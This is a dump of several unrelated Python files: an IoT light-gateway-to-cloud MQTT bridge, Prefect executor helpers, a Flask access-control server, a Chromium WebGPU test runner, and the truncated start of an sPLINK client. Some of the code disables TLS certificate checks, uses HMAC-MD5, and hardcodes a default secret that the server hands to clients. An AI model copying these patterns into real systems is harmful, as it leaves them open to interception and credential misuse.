url_wy_get_dev_list = "/light_wy/dev_list"
url_wrgb_get_dev_list = "/light_wrgb/dev_list"
# Control URLs
url_w_set_dim_level = "/light_w/set_dim_level"
url_wy_set_dim_level = "/light_wy/set_dim_level"
url_wrgb_set_dim_level = "/light_wrgb/set_dim_level"
def get_mac_addr():
mac = uuid.UUID(int=uuid.getnode()).hex[-12:]
return ":".join([mac[e:e + 2] for e in range(0, 11, 2)]).upper()
MAC_ADDR = get_mac_addr()
# Get the current timestamp in milliseconds
CURRENT_TIME_MILLIS = lambda: int(round(time.time() * 1000))
# MQTT client
client_id = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))
client = mqtt.Client(client_id)
class GatewayDevice(object):
def __init__(self, addr, visibility, dtype, pan, mac, fw_ver, connect_type, detail):
self.addr = addr
self.visibility = visibility
self.type = dtype
self.pan = pan
self.mac = mac
self.fw_ver = fw_ver
self.connect_type = connect_type
self.detail = detail
def convert_to_dict(self):
return self.__dict__
def json2GatewayDevice(json_str):
return GatewayDevice(json_str['addr'], json_str['visibility'], json_str['type'], json_str['pan'],
json_str['mac'], json_str['fw_ver'], json_str['connect_type'], None)
class CloudDevice(object):
def __init__(self):
self.deviceCode = ''
self.deviceMac = ''
self.state = ''
self.deviceName = ''
self.productKey = ''
self.productName = ''
self.deviceOriginalType = ''
self.categoryName = ''
self.brandName = ''
self.parent = 0
self.detail = ''
self.switchStatus = ''
self.detailState = ''
def convert_to_dict(self):
return self.__dict__
def log(msg):
print(str(datetime.now())+': '+msg)
def get_message_id():
return int(1e5 * random.random())
def get_gateway_info():
reqUrl = GATEWAY_URL + '/info'
resp = requests.post(reqUrl, verify=False)
data = json.loads(resp.text)
if (data['success'] == 'true'):
return data['object']
return None
def hmac_md5(ekey, to_enc):
return hmac.new(str.encode(ekey), str.encode(to_enc), hashlib.md5).hexdigest().upper()
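# A minimal sketch (not part of the original module) of the signing scheme
# cloud_auth() uses below: the concatenated key/value string is signed with
# HMAC-MD5 and the upper-case hex digest is sent as the 'sign' parameter:
#
#   to_enc = 'clientId' + MAC_ADDR + 'deviceName' + DEVICE_NO + \
#            'productKey' + PRODUCT_KEY + 'timestamp' + str(CURRENT_TIME_MILLIS())
#   sign = hmac_md5(SECRET_KEY, to_enc)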
def get_topic(product_key, device_no):
return '/' + str(product_key) + '/' + str(device_no)
def get_pub_api(product_key, device_no):
return '/topic/' + str(product_key) + '/' + str(device_no) + '/pub' + '?level=1'
def get_device_list():
req_url = GATEWAY_URL + '/get_dev_list'
resp = requests.post(req_url, verify=False)
data = json.loads(resp.text)
if data['success'] == 'true':
return data['objects']
def get_device_detail(device_dict, url):
req_url = GATEWAY_URL + url
resp = requests.post(req_url, verify=False)
data = json.loads(resp.text)
if (data['success'] == 'true'):
result = data['objects']
for json_str in result:
try:
device = json.loads(json.dumps(json_str))
if 'w' in device:
device['level'] = device['w']
device['levelW'] = device['w']
device_dict[json_str['mac']].detail = json.dumps(device)
except:
log('json type error')
# Discover all devices under the gateway
def get_all_device():
device_dict = dict()
device_list = get_device_list()
if device_list:
for json_str in device_list:
try:
device = json.loads(json.dumps(json_str), object_hook=json2GatewayDevice)
device_dict[json_str['mac']] = device
except AttributeError:
log('json attribute error')
except TypeError:
log('json type error')
# Map and convert device details
get_device_detail(device_dict, url_wy_get_dev_list)
get_device_detail(device_dict, url_wrgb_get_dev_list)
get_device_detail(device_dict, url_w_get_dev_list)
# Remove unknown devices (iterate over a copy of the keys so deletion is safe)
for key in list(device_dict.keys()):
    if device_dict[key].detail is None:
        del device_dict[key]
return device_dict
def get_cloud_device_list(device_dict):
device_list = list()
for baseDevice in device_dict.values():  # values are GatewayDevice objects
device = CloudDevice()
device.deviceName = baseDevice.mac
device.deviceOriginalType = baseDevice.type
device.deviceMac = baseDevice.addr
device.brandName = 'homw'
device.switchStatus = 'on'
device.state = 'online'
detail = dict()
detail['addr'] = baseDevice.addr
detail['connect_type'] = 'HOMwNet'
detail['detail'] = baseDevice.detail
device.detail = detail
device_list.append(device.convert_to_dict())
return device_list
# Report the gateway's child devices to the cloud
def upload_device_list(token):
log('Starting upload of data to the cloud platform...')
# Gateway devices
device_dict = get_all_device()
# Convert to cloud platform devices
device_list = get_cloud_device_list(device_dict)
up_data = dict()
up_data['messageId'] = get_message_id()
up_data['msgType'] = 'notify'
up_data['services'] = json.dumps(device_list)
header = {
'Content-Type': 'application/json',
'password': token
}
req_url = CLOUD_URL + get_pub_api(PRODUCT_KEY, DEVICE_NO)
requests.post(req_url, headers=header, json=up_data, verify=False)
def cloud_auth():
# gateway = get_gateway_info()
to_enc = 'clientId' + MAC_ADDR + 'deviceName' + DEVICE_NO + 'productKey' + PRODUCT_KEY + 'timestamp' + \
str(CURRENT_TIME_MILLIS())
# Sign the request
sign = hmac_md5(SECRET_KEY, to_enc)
# Request parameters ('&timestamp=' had been mangled into '×tamp=' by an HTML-entity artifact)
params = 'productKey=' + PRODUCT_KEY + '&sign=' + sign + '&signmethod=' + 'hmacmd5' + '&timestamp=' + str(CURRENT_TIME_MILLIS()) \
+'&version=default&clientId=' + MAC_ADDR + '&resources=mqtt&deviceName=' + DEVICE_NO
reqUrl = CLOUD_URL + '/auth?' + params
# Request headers
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
resp = requests.post(reqUrl, headers=headers, verify=False)
return json.loads(resp.text)
# MQTT connect callback
def on_connect(client, user_data, flags, code):
log("mqtt连接信息状态码:" + str(code))
topic = get_topic(PRODUCT_KEY, DEVICE_NO)
client.subscribe(topic, qos=1)
# MQTT message-arrival callback
def on_message(client, user_data, msg):
try:
recv_msg = str(msg.payload.decode("utf-8-sig"))
json_msg = json.loads(recv_msg)
msg_type = json_msg['msgType']
if msg_type == 'set':
set_command(json.loads(json_msg['services']))
except ValueError:
log('recv msg error')
def start_gateway_loop(auth_info):
mqtt_dict = auth_info['result']['resources']['mqtt']
user_name = mqtt_dict['userName']
pass_word = mqtt_dict['password']
host = mqtt_dict['host']
port = mqtt_dict['port']
# Bind callbacks
client.on_connect = on_connect
client.on_message = on_message
client.username_pw_set(user_name, pass_word)
# Establish the connection
back = client.connect(host, port, 60)
log('MQTT client connect returned (0 means success): ' + str(back))
client.loop_forever()
def set_command(msg):
command = json.loads(msg['command'])
dtype = msg['orgType']
addr = msg['seqNo']
if dtype == 'light_w':
dimUrl = GATEWAY_URL + url_w_set_dim_level + '?' + 'dev=' + addr + '&' + 'level=' + str(command[0]['ptValue'])
log(dimUrl)
resp = requests.post(dimUrl, verify=False)
# A 1-second sleep could be added here before querying the gateway again and pushing the device state to the platform
log(resp.text)
if dtype == 'light_wy':
dimUrl = GATEWAY_URL + url_wy_set_dim_level + '?' + 'dev=' + addr + '&' + 'levelW=' + str(command[0]['ptValue']) \
+ '&' + 'levelY=' + str(command[1]['ptValue'])
log(dimUrl)
resp = requests.post(dimUrl, verify=False)
log(resp.text)
if dtype == 'light_wrgb':
pass
def get_cloud_auth():
auth_info = cloud_auth()
log(auth_info)
if (auth_info['code'] != '200'):
time.sleep(5)
log('Cloud platform authentication failed, retrying...')
return get_cloud_auth()
else:
return auth_info
def upload_task():
while True:
upload_device_list(CLOUD_PASSWORD)
time.sleep(300)
if __name__ == '__main__':
# Cloud platform authentication
auth_info = get_cloud_auth()
if (auth_info['code'] == '200'):
log("认证成功")
mqtt_dict = auth_info['result']['resources']['mqtt']
CLOUD_PASSWORD = mqtt_dict['password']
# Periodic reporting
upload_thread = Thread(target=upload_task)
upload_thread.start()
# Listen for commands
start_gateway_loop(auth_info)
upload_thread.join()
|
executors.py | import multiprocessing
import os
import signal
import subprocess
import sys
import threading
import warnings
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import TimeoutError as FutureTimeout
from functools import wraps
from typing import TYPE_CHECKING, Any, Callable, List, Union
import prefect
if TYPE_CHECKING:
import prefect.engine.runner
import prefect.engine.state
from prefect.engine.state import State # pylint: disable=W0611
StateList = Union["State", List["State"]]
def run_with_heartbeat(
runner_method: Callable[..., "prefect.engine.state.State"]
) -> Callable[..., "prefect.engine.state.State"]:
"""
Utility decorator for running class methods with a heartbeat. The class should implement
`self._heartbeat` with no arguments.
"""
@wraps(runner_method)
def inner(
self: "prefect.engine.runner.Runner", *args: Any, **kwargs: Any
) -> "prefect.engine.state.State":
try:
p = None
try:
if self._heartbeat():
# we use Popen + a prefect CLI for a few reasons:
# - using threads would interfere with the task; for example, a task
# which does not release the GIL would prevent the heartbeat thread from
# firing
# - using multiprocessing.Process would release the GIL but a subprocess
                    # cannot be spawned from a daemonic subprocess, and Dask sometimes will
# submit tasks to run within daemonic subprocesses
current_env = dict(os.environ).copy()
auth_token = prefect.context.config.cloud.get("auth_token")
api_url = prefect.context.config.cloud.get("api")
current_env.setdefault("PREFECT__CLOUD__AUTH_TOKEN", auth_token)
current_env.setdefault("PREFECT__CLOUD__API", api_url)
p = subprocess.Popen(
self.heartbeat_cmd,
env=current_env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
except Exception as exc:
self.logger.exception(
"Heartbeat failed to start. This could result in a zombie run."
)
return runner_method(self, *args, **kwargs)
finally:
if p is not None:
exit_code = p.poll()
if exit_code is not None:
out, err = p.communicate()
msg = "Heartbeat process died with exit code {}".format(exit_code)
msg += "\nSTDOUT: {}".format(out.decode() if out else None)
msg += "\nSTDERR: {}".format(err.decode() if err else None)
self.logger.error(msg)
p.kill()
return inner
def main_thread_timeout(
fn: Callable, *args: Any, timeout: int = None, **kwargs: Any
) -> Any:
"""
Helper function for implementing timeouts on function executions.
Implemented by setting a `signal` alarm on a timer. Must be run in the main thread.
Args:
- fn (callable): the function to execute
- *args (Any): arguments to pass to the function
- timeout (int): the length of time to allow for
execution before raising a `TimeoutError`, represented as an integer in seconds
- **kwargs (Any): keyword arguments to pass to the function
Returns:
- the result of `f(*args, **kwargs)`
Raises:
- TimeoutError: if function execution exceeds the allowed timeout
- ValueError: if run from outside the main thread
"""
if timeout is None:
return fn(*args, **kwargs)
def error_handler(signum, frame): # type: ignore
raise TimeoutError("Execution timed out.")
try:
signal.signal(signal.SIGALRM, error_handler)
signal.alarm(timeout)
return fn(*args, **kwargs)
finally:
signal.alarm(0)
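# Illustrative usage sketch (added for exposition; must run in the main thread,
# as the docstring above requires): SIGALRM interrupts the sleeping call after
# one second.
def _example_main_thread_timeout() -> str:
    import time
    try:
        main_thread_timeout(time.sleep, 10, timeout=1)
        return "finished"
    except TimeoutError:
        return "timed out after 1 second"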
def multiprocessing_timeout(
fn: Callable, *args: Any, timeout: int = None, **kwargs: Any
) -> Any:
"""
Helper function for implementing timeouts on function executions.
    Implemented by spawning a new multiprocessing.Process() and joining with timeout.
Args:
- fn (callable): the function to execute
- *args (Any): arguments to pass to the function
- timeout (int): the length of time to allow for
execution before raising a `TimeoutError`, represented as an integer in seconds
- **kwargs (Any): keyword arguments to pass to the function
Returns:
- the result of `f(*args, **kwargs)`
Raises:
- AssertionError: if run from a daemonic process
- TimeoutError: if function execution exceeds the allowed timeout
"""
if timeout is None:
return fn(*args, **kwargs)
def retrieve_value(
*args: Any, _container: multiprocessing.Queue, _ctx_dict: dict, **kwargs: Any
) -> None:
"""Puts the return value in a multiprocessing-safe container"""
try:
with prefect.context(_ctx_dict):
val = fn(*args, **kwargs)
_container.put(val)
except Exception as exc:
_container.put(exc)
q = multiprocessing.Queue() # type: multiprocessing.Queue
kwargs["_container"] = q
kwargs["_ctx_dict"] = prefect.context.to_dict()
p = multiprocessing.Process(target=retrieve_value, args=args, kwargs=kwargs)
p.start()
p.join(timeout)
p.terminate()
if not q.empty():
res = q.get()
if isinstance(res, Exception):
raise res
return res
else:
raise TimeoutError("Execution timed out.")
def timeout_handler(
fn: Callable, *args: Any, timeout: int = None, **kwargs: Any
) -> Any:
"""
Helper function for implementing timeouts on function executions.
The exact implementation varies depending on whether this function is being run
in the main thread or a non-daemonic subprocess. If this is run from a daemonic subprocess or on Windows,
the task is run in a `ThreadPoolExecutor` and only a soft timeout is enforced, meaning
a `TimeoutError` is raised at the appropriate time but the task continues running in the background.
Args:
- fn (callable): the function to execute
- *args (Any): arguments to pass to the function
- timeout (int): the length of time to allow for
execution before raising a `TimeoutError`, represented as an integer in seconds
- **kwargs (Any): keyword arguments to pass to the function
Returns:
- the result of `f(*args, **kwargs)`
Raises:
- TimeoutError: if function execution exceeds the allowed timeout
"""
# if no timeout, just run the function
if timeout is None:
return fn(*args, **kwargs)
# if we are running the main thread, use a signal to stop execution at the appropriate time;
# else if we are running in a non-daemonic process, spawn a subprocess to kill at the appropriate time
if not sys.platform.startswith("win"):
if threading.current_thread() is threading.main_thread():
return main_thread_timeout(fn, *args, timeout=timeout, **kwargs)
elif multiprocessing.current_process().daemon is False:
return multiprocessing_timeout(fn, *args, timeout=timeout, **kwargs)
msg = (
"This task is running in a daemonic subprocess; "
"consequently Prefect can only enforce a soft timeout limit, i.e., "
"if your Task reaches its timeout limit it will enter a TimedOut state "
"but continue running in the background."
)
else:
msg = (
"This task is running on Windows; "
"consequently Prefect can only enforce a soft timeout limit, i.e., "
"if your Task reaches its timeout limit it will enter a TimedOut state "
"but continue running in the background."
)
warnings.warn(msg)
executor = ThreadPoolExecutor()
def run_with_ctx(*args: Any, _ctx_dict: dict, **kwargs: Any) -> Any:
with prefect.context(_ctx_dict):
return fn(*args, **kwargs)
fut = executor.submit(
run_with_ctx, *args, _ctx_dict=prefect.context.to_dict(), **kwargs
)
try:
return fut.result(timeout=timeout)
except FutureTimeout:
raise TimeoutError("Execution timed out.")
class RecursiveCall(Exception):
def __init__(self, func: Callable, *args: Any, **kwargs: Any):
self.func = func
self.args = args
self.kwargs = kwargs
def tail_recursive(func: Callable) -> Callable:
"""
Helper function to facilitate tail recursion of the wrapped function.
    This allows for recursion with unlimited depth since a stack is not allocated for
    each "nested" call. Note: instead of calling the target function directly, a
    `RecursiveCall` exception must be raised.
    Args:
        - func (callable): the function to decorate
    Returns:
        - a wrapped version of `func` that re-invokes it iteratively on each
          `RecursiveCall`
Raises:
- RecursionError: if a recursive "call" (raised exception) is made with a function that is
not decorated with `tail_recursive` decorator.
"""
@wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
while True:
try:
return func(*args, **kwargs)
except RecursiveCall as exc:
try:
call_func = getattr(exc.func, "__wrapped_func__")
except AttributeError:
raise RecursionError(
"function has not been wrapped to provide tail recursion (func={})".format(
exc.func
)
)
# there may be multiple nested recursive calls, we should only respond to calls for the
# wrapped function explicitly, otherwise allow the call to continue to propagate
if call_func != func:
raise exc
args = exc.args
kwargs = exc.kwargs
continue
setattr(wrapper, "__wrapped_func__", func)
return wrapper
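# Illustrative usage sketch (added for exposition): an accumulator-style
# factorial. Raising RecursiveCall replaces the direct recursive call, so the
# wrapper's loop re-invokes the function without growing the call stack.
@tail_recursive
def _example_factorial(n: int, acc: int = 1) -> int:
    if n <= 1:
        return acc
    raise RecursiveCall(_example_factorial, n - 1, acc=acc * n)
# _example_factorial(100000) completes without raising a RecursionError.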
|
server.py | #!/usr/bin/env python3
"""
This script launches the server, used as a master to handle
client configuration and validate credentials.
It can be run on any platform with Python and the pip requirements installed
"""
__version__ = '0.1'
""" """
from configparser import ConfigParser
import json
import time
from threading import Thread
""" Flask imports """
from flask import Flask, request, send_from_directory, render_template, jsonify, Blueprint
from web.router import query_js, query_styles, view_index, edp_is_alive, edp_confirm_adopt, view_access_management
""" Business import """
from lib.datasource import DataSource
from lib.visibilityManager import VisibilityManager
from lib.common import ServerSetting, DeviceConfiguration, Member, DeviceStatus, PrintColor
""" When called by external WSGI server """
if __name__ == "__main__":
CONNECTION_FILE_PATH = "./cfg/connectionString.sql" #Default
else:
CONNECTION_FILE_PATH = "/app/omni/cfg/connectionString.sql" #Default
SERVER_SECRET = "DaSecretVectorUsedToHashCommunication" #Default
connected_devices = []
app = Flask(__name__, static_url_path='')
start_time = time.time()
""" Loading static routing blueprints (static pages, ressources queries) """
app.register_blueprint(query_js)
app.register_blueprint(query_styles)
app.register_blueprint(view_index)
app.register_blueprint(edp_confirm_adopt)
app.register_blueprint(edp_is_alive)
app.register_blueprint(view_access_management)
""" Flask routing definition """
""" TODO : Put everything in the "router.py" file """
#View state
@app.route("/stateView")
def view_state():
return render_template('./server/system/stateView.html', devices=connected_devices, uptime=get_uptime())
#View enroll
@app.route("/enrollView")
def view_enroll():
""" Check devices and load settings """
source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
settingAccess = ServerSetting('enroll')
settingAccess.parameters = source.get_not_enrolled_members()
settingAccess.groups = source.get_members_groups()
settings = []
settings.append(settingAccess)
return render_template('./server/accessManagement/enrollView.html', settings=settings)
#View group
@app.route("/groupView")
def view_groups():
return render_template('./server/accessManagement/groupView.html')
#View settings
@app.route("/settingsView")
def view_settings():
""" Check devices and load settings """
source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
""" TODO : Return settings according to devices types """
settingAccess = ServerSetting('enroll')
settings = []
settings.append(settingAccess)
return render_template('./server/common/settingsView.html', settings=settings)
@app.route("/enroll", methods=['POST'])
def enroll():
member = Member(request.form['Id'])
member.lastname = request.form['lastname']
member.firstname = request.form['firstname']
member.groupId = request.form['groupId']
source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
source.update_member_info(member)
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route("/report/state", methods=['POST'])
def report_state():
data = request.data
device_status_data = json.loads(data)
for x in connected_devices:
if x.client_id == device_status_data['client_id']:
x.is_in_error = device_status_data['is_in_error']
x.error_status = device_status_data['error_status']
break
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route("/accessRule/<zone>/token/<credential>", methods=['GET'])
def validate_credential(zone, credential):
"""
Token is already calculated
"""
source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
canAccess = source.get_or_create_client_access_rights(credential, zone)
if canAccess:
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
else:
return json.dumps({'success':False}), 403, {'ContentType':'application/json'}
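# Illustrative sketch (added for exposition; the host, zone, and credential
# values are placeholders): how a client device would query this access rule.
#
# import requests
# resp = requests.get('http://192.168.0.10:5000/accessRule/front-door/token/ab12cd34')
# granted = (resp.status_code == 200)  # 403 means access denied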
@app.route("/accessRule/<zone>/<token_type>/token_data", methods=['POST'])
def report_state_zone(zone, token_type):
data = request.data
data = json.loads(data)
if token_type == 'characteristics':
print(str(data))
else:
return json.dumps({'success':False}), 404, {'ContentType':'application/json'}
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route("/configuration/<client_id>")
def configuration(client_id):
    configuration = get_configuration_by_client_id(client_id)
    # check for a missing configuration before touching its attributes
    if configuration is None:
        return json.dumps({'success':False}), 204, {'ContentType':'application/json'}
    configuration.secret = SERVER_SECRET
    """ Update client endpoint """
    for x in connected_devices:
        if x.client_id == client_id:
            x.endpoint = str(request.remote_addr)
            break
print(PrintColor.OKBLUE + "Sending configuration for client " + str(client_id))
return jsonify(configuration.serialize()), 200, {'ContentType':'application/json'}
def get_configuration_by_client_id(client_id):
source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
conf = source.load_device_configuration(client_id)
""" Update list """
for x in connected_devices:
if x.client_id == client_id:
connected_devices.remove(x)
break
connected_devices.append(conf)
return conf
def get_uptime():
from datetime import timedelta
uptime_string = str(timedelta(seconds = time.time() - start_time))
return uptime_string
def load_server_configuration():
    source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
    conf = source.load_server_configuration()
    return conf
def pre_start_diagnose():
    # assign the module-level settings read from the configuration file
    global CONNECTION_FILE_PATH, SERVER_SECRET
    print(PrintColor.OKBLUE + "Pre-start diagnostic ...")
print(PrintColor.OKBLUE + "1) Loading application configuration ...")
""" Reading configuration """
appConfig = ConfigParser()
appConfig.read('./cfg/config.ini')
print(PrintColor.OKBLUE + "Sections found : " + str(appConfig.sections()))
if len(appConfig.sections()) == 0:
raise RuntimeError(PrintColor.WARNING + "Could not open configuration file")
CONNECTION_FILE_PATH = appConfig.get("AppConstants", "ConnectionStringFilePath")
SERVER_SECRET = appConfig.get("AppConstants", "Secret")
print(PrintColor.OKBLUE + " >> Configuration OK")
print(PrintColor.OKBLUE + "2) Trying to reach datasource...")
sourceDbConnection = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
dataSourceOk = sourceDbConnection.is_reachable()
if dataSourceOk == 1:
print(PrintColor.OKBLUE + " >> Datasource OK")
else:
print(PrintColor.WARNING + " >> Datasource unreachable.")
#Only if it's run
if __name__ == "__main__":
pre_start_diagnose()
""" Start discovery manager """
visibility_manager = VisibilityManager()
discovery_thread = Thread(target=visibility_manager.listen_for_discovery_datagram)
discovery_thread.start()
print(PrintColor.OKGREEN + "Start web server...")
app.run(host='0.0.0.0', port=5000)
print(PrintColor.OKGREEN + "Web server stopped.")
visibility_manager.must_stop = True
print(PrintColor.OKBLUE + "Waiting for secondaries threads")
discovery_thread.join()
|
run_webgpu_cts.py | # Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import json
from six.moves import BaseHTTPServer
from six.moves import urllib
import sys
from tempfile import mkstemp
import threading
import os
import logging
# This script is run via //third_party/blink/tools/run_webgpu_cts.py which
# adds blinkpy to the Python path.
from blinkpy.common import path_finder
from blinkpy.common.host import Host
from blinkpy.web_tests import run_web_tests
path_finder.add_typ_dir_to_sys_path()
from typ.expectations_parser import TaggedTestListParser, Expectation
from typ.json_results import ResultType
# Basic HTTP request handler to serve the WebGPU webgpuCtsExpectations.js file
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def __init__(self, *args, **kwargs):
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def do_GET(self):
if self.path == "/webgpuCtsExpectations.js":
self.send_response(200)
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-Type', 'application/javascript')
self.end_headers()
            self.wfile.write(self.server.expectations_js.encode('utf-8'))
elif self.path == '/_start' or self.path == '/_stop':
self.send_response(200)
self.end_headers()
else:
self.send_response(404)
self.end_headers()
            self.wfile.write(b'Not found')
# Basic HTTP server which handles request using RequestHandler on a background thread.
class ExpectationsServer(BaseHTTPServer.HTTPServer):
def __init__(self, expectations_js, server_address):
BaseHTTPServer.HTTPServer.__init__(self, server_address,
RequestHandler)
self._should_run = False
self._thread = None
self.expectations_js = expectations_js
def start(self):
assert not self._thread
self._should_run = True
def _loop():
while self._should_run:
self.handle_request()
self._thread = threading.Thread(name='webgpu_expectations_server',
target=_loop)
# Mark the thread as a daemon to be sure it exits. We still have an explicit
# |stop| method because daemon threads are stopped abruptly at shutdown without
# cleaning up resources.
self._thread.daemon = True
self._thread.start()
# Ensure the server is running.
# We want to wait synchronously for this so that server startup time doesn't
# cut into test run time.
while True:
try:
urllib.request.urlopen(
'http://%s:%d/_start' %
(self.server_address[0], self.server_address[1])).read()
except IOError as e:
logging.warning(e)
continue
return
def stop(self):
self._should_run = False
try:
# Load a url so |handle_request| returns.
urllib.request.urlopen(
'http://%s:%d/_stop' %
(self.server_address[0], self.server_address[1])).read()
except IOError as e:
logging.warning(e)
self._thread.join()
self._thread = None
def split_cts_expectations_and_web_test_expectations(
expectations_file_contents, platform_tags=None):
"""Split web test expectations (bit.ly/chromium-test-list-format) into a Javascript
module containing expectations for the WebGPU CTS, and a filtered list of the same web
test expectations, excluding the bits handled by the WebGPU CTS. Returns an object:
{
cts_expectations_js: "export const expectations = [ ... ]",
web_test_expectations: {
expectations: <expectations contents>
tag_set: <frozenset of tags used by the expectations>
result_set: <frozenset of result tags used by the expectations>
}
}"""
cts_expectations = []
out_tag_set = set()
out_result_set = set()
out_expectations = []
parser = TaggedTestListParser(expectations_file_contents)
# For each expectation, append it to |cts_expectations| if the CTS can understand it.
# Expectations not supported by the CTS will be forwarded to the web tests harness.
# This allows us to preserve expectations like [ Slow Crash Timeout RetryOnFailure ].
# It also preserves expectations like [ Pass ] which are used for test splitting.
# TODO(crbug.com/1186320): Handle test splits / variant generation separately?
# Web test expectations that are passed through are run as separate variants.
# Since [ Slow Crash Timeout RetryOnFailure Pass ] are Web test expectations,
# they have the downside that they must be a prefix of the test name. If they don't match
# anything the variant generator will warn.
# TODO(crbug.com/1186320): Also validate the CTS expectation query.
# TODO(crbug.com/1186320): We may be able to use skip expectations in the
# CTS for Crash/Timeout, and then have a separate test suite which runs only the problematic
# tests. We would generate variants specifically for each expectation to avoid the
# prefix problem. This would allow us to have exact test suppressions at the cost of
# potentially running some tests multiple times if there are overlapping expectations.
for exp in parser.expectations:
# Skip expectations that are not relevant to this platform
if platform_tags is not None and not exp.tags.issubset(platform_tags):
continue
results = exp.results
raw_results = exp.raw_results
# Do not do special handling of expectations that aren't for the CTS.
# ex.) ref tests run in WPT without the CTS.
# TODO(crbug.com/1186320): This could be a more robust check.
if 'q=webgpu:' in exp.test:
# Pass Skip expectations to the CTS.
if ResultType.Skip in results:
assert len(
results
) == 1, 'Skip expectations must not be combined with other expectations'
cts_expectations.append({
'query': exp.test,
'expectation': 'skip'
})
continue
# Consume the [ Failure ] expectation for the CTS, but forward along other expectations.
# [ Pass, Crash, Timeout ] will impact variant generation.
# TODO(crbug.com/1186320): Teach the CTS RetryOnFailure.
if ResultType.Failure in results and not exp.should_retry_on_failure:
cts_expectations.append({
'query': exp.test,
'expectation': 'fail'
})
results = results.difference(set((ResultType.Failure, )))
raw_results = [r for r in raw_results if r != 'Failure']
if len(raw_results) != 0:
# Forward everything, with the modified results.
out_exp = Expectation(reason=exp.reason,
test=exp.test,
results=results,
lineno=exp.lineno,
retry_on_failure=exp.should_retry_on_failure,
is_slow_test=exp.is_slow_test,
conflict_resolution=exp.conflict_resolution,
raw_tags=exp.raw_tags,
raw_results=raw_results,
is_glob=exp.is_glob,
trailing_comments=exp.trailing_comments)
out_expectations.append(out_exp)
# Add the results and tags the expectation uses to sets.
# We will prepend these to the top of the out file.
out_result_set = out_result_set.union(out_exp.raw_results)
out_tag_set = out_tag_set.union(out_exp.raw_tags)
return {
'cts_expectations_js':
'export const expectations = ' + json.dumps(cts_expectations),
'web_test_expectations': {
'expectations': out_expectations,
'tag_set': out_tag_set,
'result_set': out_result_set
}
}
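# Illustrative sketch (added for exposition; the expectation lines are made up):
# the [ Failure ] on a WebGPU CTS query is consumed as a CTS 'fail' expectation,
# while the non-CTS [ Crash ] line is forwarded to the web test harness.
def _example_split():
    contents = ('# results: [ Failure Crash ]\n'
                'wpt_internal/webgpu/cts.https.html?q=webgpu:api,foo:* [ Failure ]\n'
                'external/wpt/some_ref_test.html [ Crash ]\n')
    return split_cts_expectations_and_web_test_expectations(contents)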
def main(args, stderr):
parser = argparse.ArgumentParser(
description=
        'Start the WebGPU expectations server, then forward to run_web_tests.py'
)
parser.add_argument('--webgpu-cts-expectations', required=True)
options, rest_args = parser.parse_known_args(args)
web_test_expectations_fd, web_test_expectations_file = mkstemp()
forwarded_args = rest_args + [
'--ignore-default-expectations', '--additional-expectations',
web_test_expectations_file
]
run_web_tests_options = run_web_tests.parse_args(forwarded_args)[0]
# Construct a web tests port using the test arguments forwarded to run_web_tests.py
# (ex. --platform=android) in order to discover the tags that the web tests harness will
# use. This includes the OS, OS version, architecture, etc.
platform_tags = Host().port_factory.get(
run_web_tests_options.platform,
run_web_tests_options).get_platform_tags()
with open(options.webgpu_cts_expectations) as f:
split_result = split_cts_expectations_and_web_test_expectations(
f.read(), platform_tags)
# Write the out expectation file for web tests.
with open(web_test_expectations_file, 'w') as expectations_out:
web_test_exp = split_result['web_test_expectations']
expectations_out.write('# tags: [ ' +
' '.join(web_test_exp['tag_set']) + ' ]\n')
expectations_out.write('# results: [ Slow ' +
' '.join(web_test_exp['result_set']) + ' ]\n\n')
for exp in web_test_exp['expectations']:
expectations_out.write(exp.to_string() + '\n')
server = ExpectationsServer(split_result['cts_expectations_js'],
('127.0.0.1', 3000))
logging.info('Starting expectations server...')
server.start()
try:
run_web_tests.main(forwarded_args, stderr)
finally:
logging.info('Stopping expectations server...')
server.stop()
os.close(web_test_expectations_fd)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:], sys.stderr))
|
splink_client_project.py | """
Client-side sPLINK project to compute local parameters
Copyright 2021 Reza NasiriGerdeh and Reihaneh TorkzadehMahani. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from hyfed_client.project.hyfed_client_project import HyFedClientProject
from hyfed_client.util.hyfed_steps import HyFedProjectStep
from hyfed_client.util.operation import ClientOperation
from hyfed_client.util.data_type import DataType
from splink_client.util.splink_steps import SplinkProjectStep
from splink_client.util.splink_algorithms import SplinkAlgorithm
from splink_client.util.splink_parameters import SplinkGlobalParameter, SplinkLocalParameter, SplinkProjectParameter
from splink_client.util.gwas_dataset import GwasDataset, PhenotypeValue, SnpValue, MissingValue
import numpy as np
import threading
import multiprocessing
class SplinkClientProject(HyFedClientProject):
"""
A class that provides computation functions to compute local parameters for chi-square, linear/logistic regression
"""
def __init__(self, username, token, project_id, server_url, compensator_url,
algorithm, name, description, coordinator, result_dir, log_dir,
dataset_file_path, phenotype_file_path, covariate_file_path, # Splink specific arguments
phenotype_name, covariate_names, chunk_size, max_iterations, cpu_cores): # Splink specific arguments
